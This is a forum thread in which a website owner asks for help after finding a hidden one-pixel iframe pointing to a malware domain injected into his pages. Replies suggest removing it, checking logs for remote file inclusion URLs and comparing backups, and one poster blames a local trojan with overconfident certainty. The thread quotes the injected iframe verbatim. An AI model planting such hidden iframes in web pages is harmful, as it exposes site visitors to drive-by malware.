Hacked!

[deansaddigh]

Hi guys, some how someone has physically changed my pages and added

<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>

How have they done this, do you think they have got into our ftp account.

Heres  a page with it on.

 

http://www.languageschoolsuk.com/coursecalculator.php

 

if you look at source code , right at the end near the footer you can see.

 

Any help and advice would be brilliant because i have nooooo idea.

[TeddyKiller]

I dont have any ideas, but actually removing it is a start. If they continue to put it up, I'd suggest maybe track there IP and block it. Assumign it was user based, they could of done alot more than adding in an iframe practically invisible.

 

I can actually say, that iframe is on every page in your site. I only checked 3, but if theres 3 random ones with the iframe in, it's likely they'll be alot more!

[TeddyKiller]

http://www.Brenz.pl/rc/

Is the actual site in which was placed in the iframe. There was an unsuccesful typo. So.. I guess you got lucky, otherwise that could of been deadly. I just checked the site, it gave me a warning.

[deansaddigh]

Thanks Teddy for your advice, i have started to remove them all.

The thing i dont understand is, to physically change the page. they would have to have hacked our ftp server and physically modified the page, am i wright in thinking this.

[TeddyKiller]

Hmm.. well sort of. There are other methods of hacking. Though don't ask me.. I don't know how to hack.

[PFMaBiSmAd]

The web server access logs would indicate the who/what/when the files were modified (wrote to.) That would pin down if it was through FTP access, through the web hosting control panel, or through a script on your site (or some other site on the server.)

 

Assuming that your pages include content that is specified on the end of the URL, you should also look at the access logs to find any unusual URLs where your pages were requested with get parameters that could have gotten your script(s) to execute included php code from another site. There would be whole URL's supplied as get parameters, something like -

 

http://yourdomain.com/your_page.php?page=http://someURL/some_page.ext

 

You should also download all the files and compare them with the last backup up make so that you can both find exactly what was changed and find any new files (such as a file management script that got uploaded to your site.)

[deansaddigh]

Thanks for taking the time to reply.

Im going to check what you have suggested, looks quite complex, but ill do some reading up on what you said.

[Lekoaf]

This is NOT someone who has hacked your FTP.

This comes from a trojan virus on your computer that not only screws up your whole computer, denying you access to any antivirus sites and stops all downloads.

It also infects ALL your HTML files on your computer with this little IFrame script.

 

I basically had to wipe my harddrive clean to get rid of the virus and after getting all my backed up files to my computer again I noticed that I had "infected" my entire website as well the next time I updated it.

 

The reason for me necro posting this is because this topic comes up as top 3 on Google when searching for "Brenz.pl/rc/".

I just thought the information should be correct.

 

I hope this helps someone!